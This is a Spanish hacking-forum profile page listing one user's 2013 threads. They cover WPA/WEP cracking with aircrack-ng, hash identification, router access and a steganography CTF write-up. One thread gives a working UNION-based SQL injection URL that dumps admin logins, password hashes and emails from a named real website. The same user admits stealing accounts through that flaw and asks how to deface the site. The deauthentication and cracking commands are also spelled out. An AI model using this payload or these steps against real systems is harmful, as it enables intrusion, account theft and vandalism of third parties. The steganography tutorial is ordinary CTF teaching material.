• Inicio
  • Buscar
  • Ingresar
  • Registrarse

    Meta Quest 3: todo lo que necesitas saber sobre las nuevas gafas de realidad virtual de Meta

    • Hack x Crack - Comunidad de Seguridad informática »
    • Perfil de noopynoob »
    • Mostrar Mensajes »
    • Temas
    • Información del Perfil
      • Resumen
      • Mostrar Estadísticas
      • Mostrar Mensajes...
        • Mensajes
        • Temas
        • Adjuntos

    Mostrar Mensajes

    Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

    • Mensajes
    • Temas
    • Adjuntos

    Temas - noopynoob

    Páginas: [1] 2 3 4
    1
    Hacking Wireless / No logro sniffar red
    « en: Diciembre 27, 2013, 01:20:24 am »
    Saludos, veran inicie kali en un live cd en una laptop obviamente con permisos de root, me conecte a una red y pongo wireshark en la consola, elijo la opcion wlan0 y solo sniffa los paquetes de la pc que estoy usando y no de las demas, alguna idea de porque da este problema?

    2
    Hacking Wireless / [problema] no logro crackear wpa
    « en: Diciembre 10, 2013, 08:38:16 pm »
    Saludos veran, hace tiempo que he intentado con WEP y funciona, pero cuando intento con WPA/ WPA2 no funciona.

    Lo primero es ponerlo en modo monitor, y estos son los comandos cuando recien inicio kali linux

    MAC = bssid de mi ap
    STATION = esta es la mac de otra pc conectada a mi red

    > airmon-ng start wlan0
    > airodump-ng mon0
    > airodump-ng mon0 --channel 1 --bssid MAC -w /root/handshake
    > aireplay-ng -0 1 -a MAC -c STATION mon0

    hasta aqui todo bien, pero cuando pongo el ultimo comando:

    > ./usr/sbin/john --stdout --increment:all | aircrack-ng -b MAC -w - /root/handshake-01.cap

    ./usr/sbin/john es la ruta del programa John the ripper,  /root/handshake-01.cap el handshake que hize anteriormente, el numero de #DATA era de 1500. en teoria deberia funcionar pero me aparece esto:

    No valid wpa handshake found.

    Luego intente esto, hice un .txt y escribi mi clave y lo guarde

    > aircrack-ng -w /root/pass.txt -b MAC /root/handshake-0.1.cap

    igual me devuelve esto:

    No valid WPA handshake found

    comprobe que las rutas y archivos existen pero igual no puedo ejecutar este ataque, ya busque en google y dice que hace falta mas #DATA pero iba por 500, 1000, 1500, 2000 ...  y sigue apareciendo lo mismo alguna idea para solucionarlo? espero sus respuestas.

    3
    Criptología / que encriptacion es esta?
    « en: Noviembre 27, 2013, 07:19:01 pm »
    alguien me ayuda a descifrarlo no se que tipo de cifrado es:

    Citar
    $2a$15$Jqp5xZtNo8bfYshqJeVLrOpXg7GZj1caFuLmcsvriPcIkKRkp2Jl2

    4
    Hacking web / Inyección SQL no funciona
    « en: Noviembre 23, 2013, 12:32:19 am »
    Saludos, recuerdan el tema anterior?

    http://foro.hackxcrack.net/forum/defacing/como-defacear-este-sitio-web/

    Como sabran el sitio la hackearon, los administradores lo dejaron fuera de servicio y siendo el colmo la ignorancia que ahora esta online otra vez AUN VULNERABLE!.

    el user y password que encuentro en la db es este:

    http://www.ampos.com/noticias.php?id=-1+union+select+1,group_concat(login,0x3a,password,0x3a,email,0x3a,Nombre),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin_usuarios--

    pueden ver que primero esta el user "andres" despues la password encriptada en md5 (usen un md5 decrypt) el email en blanco, y el nombre.

    panel del admin:  www.ampos.com/admin/

    pues NO ENTRA!! deberia funcionar no? alguna idea?

    5
    Hacking web / Como defacear este sitio web?
    « en: Noviembre 04, 2013, 04:53:43 pm »
    Bueno, no voy a entrar con la típica pregunta de como hackear una pagina web, conozco hace meses una pagina web vulnerable a sqli y la usaba para robar las cuentas de algunos usuarios, pero esta vez entre y la han hackeado.

    miren en lo que hay en la pagina principal de www.ampos.com




    entonces esto se puede hacer directamente con sqli? se puede borrar y modificar las tablas de la base de datos con inyección sql? o ya es con otro metodo, saludos

    6
    Dudas Generales / necesito ayuda con un calculo
    « en: Octubre 30, 2013, 04:00:54 pm »
    Saludos comunidad, tengo un problema sobre hacer un calculo de este modo:

    Por ejemplo digamos si tengo la cadena de letras minúsculas del abecedario

    Citar
    abcdefghijklmnopqrstuvwxyz

    son 26 caracteres, ¿ como podría calcular el número total de combinaciones posibles ? ¿ si pueden ser tanto minúsculas como mayúsculas ? ¿ con la cadena 0123456789 ?

    bueno solo eso, gracias de antemano

    7
    Redes (WAN, LAN, MAN, CAM, ...) / duda sobre router
    « en: Octubre 25, 2013, 02:16:30 am »
    Tengo un problema cuando quiero acceder remotamente a un router, me conecte a una red del instituto y puedo acceder a su router con la puerta de enlace predeterminada, pero cuando averiguo su IP publica y accedo a ella me redirige a una ipcamera (***.***.**.***) esa ip es estática, me surgió la duda si quizás la ip publica de la red es diferente a la ip publica del router, o de pronto el router no tenga servidor ftp, bueno agradeceria si me aclaran esta duda, Saludos

    8
    Otros / Que lenguaje de programacion es este?
    « en: Octubre 08, 2013, 12:09:40 am »
    Saludos comunidad, veran, me descargue el código fuente de un juego en linea y cuando lo iba a editar con sothink swf decompiler, abrió esto, no se que lenguaje de programación es, por lo que veo es un lenguaje orientado a objetos muy similar a C++ pero aun no se exactamente que lenguaje de programación es, aqui subi solo una parte del codigo:

    http://pastebin.com/WCaQyh89

    Gracias de antemano

    9
    Retos no oficiales / Wargame's - retos de esteganografia resueltos
    « en: Octubre 06, 2013, 07:33:57 pm »
    Buenas comunidad! aquí les regalo la solución de los 3 retos de esteganografía debido a la insistencia por la solución y el tiempo considerable del tiempo de vida de los wargames mas un tutorial que decidí hacer para la comunidad.

    Antes que nada hice un pequeño tutorial de este tema de la esteganografia, no voy a profundizar mucho porque de eso no trata el tema pero voy a explicar unos conceptos básicos y las utilidades que puede llegar a tener.


    Actualmente la esteganografía esta demasiado relacionada con el área de la informática, esto es debido a que por medio del Internet podemos transportar información a cualquier punto geográfico y a grandes velocidades, lo cual en la antigüedad era un serio problema. Debido a la multitud de lenguajes que es capaz de interpretar un ordenador, la criptografía se relaciona de una manera colosal con la esteganografía, de esta manera primero se hace ilegible un mensaje, y por ultimo lo escondes. Claro todos esos lenguajes están relacionados con la informática (binario, octal, base 64...Etc.).

    Es decir lo mas importante es aprender lo básico del sistema binario, hexadecimal, decimal, etc. y sus conversiones, en este tema no los voy a explicar porque como ya dije voy a centrarme en lo que es, pero tu puedes investigar por tu cuenta en internet hay mucha información.

    http://es.wikipedia.org/wiki/Sistema_binario
    http://es.wikipedia.org/wiki/Sistema_hexadecimal
    http://es.wikipedia.org/wiki/ASCII

    La esteganografía digital actual se basa en esconder bits, cabe mencionar que no es la única, pero el trabajar en niveles tan pequeños siempre nos dará un mejor resultado. Cuando hablamos de bits hablamos de pequeños bancos de información, nos referimos a puros número que tienden a tener un valor significativo. Dada la cantidad de números que tienen los demás lenguajes, la esteganografía a nivel bits la
    manejaremos en el lenguaje más sencillo y cómodo, nos referimos al lenguaje binario
    .

    Existen técnicas de ocultar información en imágenes por medio de modificación de bits, o simplemente cifrar mensajes en binario, también marcas de agua en fin; una cantidad indefinida de técnicas. Las maneras en que ocultaremos información en este hilo son las principales y de ellas se derivan muchas, cabe mencionar que hay que aprender a crear métodos nuevos y efectivos. Pero antes de empezar a manipular estas técnicas debemos aprender todo lo relacionado con historia, formatos etc.

    mas info:

    http://es.wikipedia.org/wiki/Esteganograf%C3%ADa

    ¿Como puedo ocultar mi información?

    Es bastante sencillo aquí les mencionare algunas técnicas, aunque la esteganografia se basa mas en la creatividad mas que nada.

    Ocultar documentos *.rar en archivos *.JPG.

    Digamos que tenemos 2 archivos, 1 documento *.rar y un archivo *.jpg y queremos ocultar el rar dentro de una *.jpg para hacerlo pasar desapercibido. Lo primero que tendremos que tener en cuenta ser la “jerarquía” con la que ejecutaremos el comando.
    Habrán el CMD (inicio/ejecutar/cmd).
    Ahora tendrán que escribir:

    Copy /B c:\mifoto.jpg + c:\elrar.rar c:\fotorar.jpg

    Copy: Es copiar.
    /b: Nos indica que copiaremos el archivo como binario.
    c:\mifoto.jpg Hace referencia al nombre del archivo y la ruta donde lo tengo
    guardado,
    c:\elrar.rar Hace referencia al nombre del archivo *.rar y la ruta donde lo tengo
    guardado.
    Lo que hicimos con este comando, es básicamente ocultar un *.rar dentro de la
    imagen, así podrás abrir la imagen y hacer que no quede evidencia del .*rar, pero si cambiáramos la extensión de nuestro *.jpg a *.rar obtendremos el documento *.rar y podremos extraer de el todo lo que contiene.


    ¿Pero este método solo funciona en sistema windows?

    ni mas faltaba, por supuesto que no, en sistema linux es lo mismo solo que es con el siguiente comando:


    cat "archivo.zip" >> "foto.gif"


    Eso es básicamente lo que hice en el primer reto, es un método efectivo pero fácilmente detectable mas adelante explico porque.

    Método (LSB).

    según wikipedia, El método LSB (Least Significant BIT Insertion) - (Inserción en el BIT menos significativo), como bien lo dice su nombre, es un método que consiste en insertar información en el BIT con menos valor, esto para que la modificación que se haga en la imagen no sea demasiado notoria. Esta técnica puede ser usada para video y audio, pero es más recomendable en imágenes, pues estas por su alta definición en dimensiones y calidad, será casi imposible que algún cambio se pueda detectar. Para entender mejor esto pondré como se modificaría un código binario para insertar alguna letra.

    (1 1 0 1 1 0 1 0) (0 1 0 0 1 0 0 1) (0 1 0 0 0 0 1 1)
    (0 0 0 1 1 1 1 0) (0 1 0 1 1 0 1 1) (1 1 0 1 1 1 1 1)
    (0 0 0 0 1 1 1 0) (0 1 0 0 0 1 1 1) (0 0 0 0 0 1 1 1)

    El mensaje a cifrar es ‘A’ cuya representación ASCII es (1 0 0 1 0 1 1 1), entonces los nuevos píxeles alterados serían:

    (1 1 0 1 1 0 1 1) (0 1 0 0 1 0 0 0) (0 1 0 0 0 0 1 0)
    (0 0 0 1 1 1 1 1) (0 1 0 1 1 0 1 0) (1 1 0 1 1 1 1 1)
    (0 0 0 0 1 1 1 1) (0 1 0 0 0 1 1 1) (0 0 0 0 0 1 1 1)

    Observar que se ha sustituido el bit del mensaje (letra A, marcados en negritas) en cada uno de los bits menos significativos de color de los 3 píxeles. Fueron necesarios 8 bytes para el cambio, uno por cada bit de la letra A, el noveno byte de color no se utilizó, pero es parte del tercer pixel (su tercera componente de color). Esto es bastante efectivo y difícil de detectar aunque decidí no incluirla en los retos por su complejidad, aunque sabiendo esto lo puedo hacer para un próximo reto.

    Conclusión:


    Como pudieron notar la esteganografia se basa en la creatividad, los retos que hice fueron solo ideas y tengo muchas mas, esto es algo que se ha practicado desde el inicio de la historia hasta hoy, aun falta mucha información que no decidí incluir y puede que se desvié de su propósito original, mas lo veo como un arte y muchas otras cosas, bueno ya depende de la imaginación e ingenio de cada uno, ahora vamos a ver la solución de los retos, aunque creo que con esto ya les di las respuesta a todos los 3 jaja, vamos a ver..

    [Wargame] Reto de Esteganografía[Facil]

    Este fue el reto mas fácil y exitoso lo resolvieron 6 usuarios:

    prow
    Thaine Arys
    <[Zoro]248>
    Bladeyer
    yehuju
    sensei

    Decidí hacer dos porque el fichero no lo ejecutaba linux (eso no significa que se pueda hacer uno para ambos).

    Solución

    Lo primero era cambiar la extension a .rar, deben considerar que siempre deben intentar cambiarle la extensión de una imagen a .rar es lo mas usual, es una practica bastante utilizada y efectiva,  Esto es debido que todo tipo de archivo, en su cabecera, entre otros, contiene ciertos bytes fijos (en cantidad y ubicación) usados exclusivamente para indicar el tamaño del archivo. La aplicación que utilice un archivo, de cualquier tipo, siempre lee su cabecera primero, adquiere ese valor como su tamaño (en cantidad de bytes) y seguidamente lee el resto del archivo hasta el final indicado por dicho valor. De modo que si se coloca algo (mensaje) más allá del valor de ese parámetro, no será leído por la aplicación normal, por tanto no detectado, y el archivo portador funcionará normalmente.  tiene la gran desventaja que provoca crecimiento del portador, tanto como el tamaño de su mensaje, siendo por tanto una estrategia fácilmente detectable. Un sencillo programa de estegoanálisis lo detecta por la sola lectura de su cabecera y la comprobación del tamaño real de archivo portador; incluso cualquier usuario desconfiado puede muchas veces sospechar del portador por su tamaño ocupado en disco en relación a su contenido.

    Es decir si la imagen tiene su propio tamaño reservado, ejecuta hasta dicho tamaño, el resto sera ignorado podemos comprobarlo si abrimos la imagen con un editor hexadecimal y si buscamos al final veremos algo sospechoso...

    bueno como les decía le cambiamos la extensión a la imagen avqx.jpg por avqx.rar, si no te muestra la extensión puedes configurar que te la muestre del panel de control esto es básico, quedando de este modo:



    abrimos ese fichero y te muestra que contiene otro archivo si lo extraemos tendremos esto:


    si abrimos ese archivo, tendremos esto:


    como nos dice aun nos falta encontrar la verdadera información, pero es un .bat y esa extensión es la mas fácil de ver su código fuente, solo cambiando su extensión a .txt o abriéndolo con cualquier editor de texto como el notepad


    nos muestra un link lo mas lógico seria ir a esa dirección con el navegador


    miramos su codigo fuente...


    entramos a esa pagina y veremos la misma con unos botones tipo frame, elegimos el otro y listo:


    como pueden ver es un reto muy sencillo que con un poco de creatividad y lógica puedes llegar a la solución, para linux es lo mismo solo que el en vez del .bat es un .sh ya que tenia unos problemas con la compatibilidad de esos dos.


    [Wargame] Reto de Esteganografía 2 [medio]

    Este es un reto medio, fue resuelto por dos usuarios:

    prow
    Bladeyer

    Este reto es diferente del anterior, solo necesitas un editor hexadecimal y buscar el mensaje, bastante simple no? la ventaja es que no altera el tamaño y es difícil de detectar, este es el método moderno más común y popular usado para esteganografía, también es uno de los llamados métodos de sustitución. Consiste en hacer uso del bit menos significativo de los pixels de una imagen y alterarlo. La misma técnica puede aplicarse a vídeo y audio, aunque no es lo más común. Hecho así, la distorsión de la imagen en general se mantiene al mínimo (la perceptibilidad es prácticamente nula), mientras que el mensaje es esparcido a lo largo de sus píxeles. Esta técnica funciona mejor cuando el archivo de imagen es grande, posee fuertes variaciones de color ("imagen ruidosa") y también aventaja cuanto mayor sea la profundidad de color.

    primero con un editor hexadecimal de 16 columnas abrimos la imagen yo usare HxD pero hay muchos otros


    abrimos la imagen con el HxD para ver su contenido



    Pueden ver que aplique el método LSB ya que coloque el mensaje al final de cada fila del offset, con la diferencia que no fue transformado a binario, ya que fuera muy dificíl de encontrar.

    [Wargame] Reto de Esteganografía 3 [medio]

    Este reto fue bastante fácil, ya que con un poco de observación y lógica podías llegar a la respuesta, fue resuelto por tres personas

    Bladeyer
    Aneraka
    Kyr4-bl4ck

    Cuando descargábamos el fichero vimos que esta dañado (un posible interceptor lo puede ignorar) pero en realidad hay que saber sacar dicha información, si vemos su estructura con el editor hexadecimal veremos esto:


    como podemos ver no hay cabecera... pues facil abrimos otra imagen .png cualquiera y tenemos esto:


    ahora lo lógico seria reemplazar la cabecera editada por la cabecera original de .png para arreglar el archivo y acceder a el, lo guardamos y vemos como ya lo resolvimos:


    Bueno, eso es todo, espero que les haya gustado, aun falta mucha información pero el post no pretende a estudiar todo sobre esteganografia, el post es de autoria propia aunque siempre hay una fuente por el conocimiento adquirido, pues bien, la mayor parte de la información es de wikipedia, y tutoriales de infiernohacker y taringa, pues a continuación esta la fuente de la mayor parte de la información aquí expuesta:

    http://es.wikipedia.org/wiki/Esteganograf%C3%ADa
    http://www.taringa.net/posts/info/15371860/Como-ocultar-archivos-adentro-de-imagenes-audio-o-videos.html

    Aquí un manual que les recomiendo ampliamente, pertenece a infiernohacker.com :

    http://foro.infiernohacker.com/index.php?topic=12215.0

    Saludos y esperen los próximos retos mas complejos y diferentes

    10
    Retos no oficiales / [wargame - ON] crackme facil
    « en: Octubre 03, 2013, 03:24:29 am »
    Bueno gente, aquí un nuevo reto sobre cracking, solo tienes que conseguir la password para crackear el programa y lograr el reto, cuando finalice un plazo de 8 días publico la solución, corre en sistema windows, tambien en sistema linux pero necesitas wine que la mayoria de las veces ya viene instalado en la distribucion de linux, suerte,  aquí el crackme:

    http://www.mediafire.com/?b4l5h6zg8tdkbgg

    Users que lo han resuelto:
    1st.  yehuju
    2nd.  su
    3rd.   

    11
    Retos no oficiales / [Wargame - OFF] Reto de Esteganografía 3 [medio]
    « en: Septiembre 28, 2013, 02:46:32 am »
    Bueno comunidad, el anterior tema fue un fracaso porque tuve unos problemas con el servidor pero ya encontré una mejor solución

    este es el tercer reto de esteganografia que publico, ya saben que es buscar la password oculta, y usare la misma metodología que los retos anteriores publicare la solución y tutoriales el mismo dia para los tres retos (o los que haya), tambien dire las utilidades que esto puede tener.

    Entonces decía que decidí elaborar este tercer reto que quedo tremendamente mal, pero se que son capaces de enviarme la solución, el visualizador de fotos que tenga no te servirá, pues es tu trabajo hacer que funcione, sin mas preámbulo aquí esta el reto:

    reto:
    http://www.mediafire.com/?6fayhs61m0cs3p2

    Ganadores:
    1st.   Bladeyer
    2nd.  aneraka
    3rd.   Kyr4-bl4ck

    12
    Retos no oficiales / [Wargame - OFF] Reto de Esteganografía 2 [medio]
    « en: Septiembre 27, 2013, 02:24:44 am »
    bueno comunidad, en vista del éxito y buenas opiniones que tuve del reto anterior

    http://foro.hackxcrack.net/forum/wargames/(wargame)-reto-de-esteganografia/

    pues decidí elaborar otro con una dificultad poco mayor que el reto anterior, en este caso tienes que buscar un mensaje oculto en la imagen, haré la misma metodología que el reto anterior, publicare su solución el mismo día que el otro en un nuevo tema (miercoles 09 de octubre) y iré colocando en este hilo los users que lo vayan resolviendo, y como ya sabrán es buscar lo oculto en este caso un mensaje y enviármelo por mp para irlos agregando a la lista. ya lo probé en sistema windows y en sistema unix y anda a la perfección en ambos, entonces suerte...

    reto:


    Atención !!!

    Me acabe de dar cuenta de la existencia de unos editores hexadecimales que se salen del offset, disculpen la molestia pero en realidad no sabia que existían ademas no se los recomiendo porque no te muestran los bits mas/menos significativos y te los muestra de una manera muy desordenada y muy poco técnica, como es el caso de lfhex y ghex

    por favor les recomiendo que se bajen un buen editor hexadecimal, que no se salga del offset, es decir, que te muestre exactamente 16 columnas (00 - 0F) aquí les dejo unos links de unos editores hexadecimales que les recomiendo

    para windows:


    HexEditor (HxD):

    http://hxd.softonic.com/

    NeoEditor:

    http://www.hhdsoftware.com/free-hex-editor

    para linux:

    apt-get install hexedit



    eso es todo, disculpen las molestias

    Pd. Un buen editor hexadecimal no solo te servirá para resolver retos de esteganografia, recuerden que esta es una poderosa herramienta ampliamente usada en el mundo del hacking, también sirve bastante en la esteganografia y en la ingeniería inversa o cracking entre otras.



    Ganadores:
    1st.   prow
    2nd.   Bladeyer
    3rd.   

    13
    Retos no oficiales / [Wargame - OFF] Reto de Esteganografía [Facil]
    « en: Septiembre 25, 2013, 05:37:32 pm »
    Bueno comunidad como ya les había dicho a algunos sobre los wargames que ya es una pagina aparte y esta sección murió, hice un reto sobre esteganografía, al principio pensé hacerlo incluyéndole criptografia pero el reto se estaba convirtiendo bastante largo y complejo y abarcaba ya otros terrenos del mundo del hacking, decidí quitarle algunas características entre ellas la criptografia ( ya que esto lo puedo incluir en futuros retos ) dejando solo esteganografia.

    Mi propósito es ayudar revivir esta sección de wargames, si este reto tiene éxito ideare para inventar otros y sobre otros temas, daré un plazo de 15 días para publicar la solucion  e iré poniendo en este tema a los users que lo vayan resolviendo.
    recuerden que como siempre es buscar lo oculto, en este caso una clave.

    Bueno aquí esta el reto:


    Para sistema windows:

    http://imageshack.us/scaled/landing/138/avqx.jpg



    Para sistema UNIX:

    http://imageshack.us/scaled/landing/850/lobr.jpg



    Ganadores
    1st.   prow
    2nd.   Thaine Arys
    3rd.   <[Zoro]248>
    Bladeyer
    yehuju
    Sensei

    14
    Retos no oficiales / duda sobre el reto overcrackme2
    « en: Septiembre 07, 2013, 07:00:06 pm »
    Saludos, Tengo una duda sobre el reto overcrackme2, pues cuando lo descargo es el mismo fichero que el overcrackme1, dice que le cambie la password a sudoCRACKEATE y que lo envie pero el campo es de texto y utilice la letra a (no entiendo que significa).

    No entiendo nada alguien me puede explicar en que consiste este reto y que tengo que hacer para resolverlo ? gracias.

    15
    Dudas Generales / wireless cracking: problema en el ultimo paso [solucionado]
    « en: Septiembre 02, 2013, 01:55:35 am »
    Hola hxc, estuve ausente un tiempo pero, ya volvi con una duda sobre el cuaderno wireless cracking, en el primer tutorial explican sobre como crackear WEP, configure mi AP con seguridad WEP y una password muy sencilla (emcal) y resulta que todo iva muy bien pero cuando puse el comando final (aircrack-ng underc0de-01.cap) aparece que esta crackeando la password con exito y cuando finaliza me salta un error que dice Failed. Next try 5000 IV's sin salirse del comando a menos que presione ctrl y c

    Mi pregunta es como se cuantos IV's tengo y como hago para llegar a los 5000 IV's. O que tengo que hacer para crackear la password, lo dejo mas tiempo ? tengo que escribir otros comandos ?

    Estuve mirando en la ayuda de aircrack (aircrack-ng --help) con el comando - M especifica el numero de IV's máximo. Pero no hay ninguno para especificar el numero de IV's mínimo para "decirle" que ejecute como mínimo 5000 IV's

    aqui hay una imagen del problema, perdon por el tamaño de la imagen.



    muchas gracias

    Pd. Uso kali linux, la seguridad es WEP 64 bits, la contraseña es emcal, no debería ser tan complicado

    Páginas: [1] 2 3 4
    • SMF | SMF © 2013, Simple Machines
    • XHTML
    • RSS
    • WAP2
    Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso... Learn more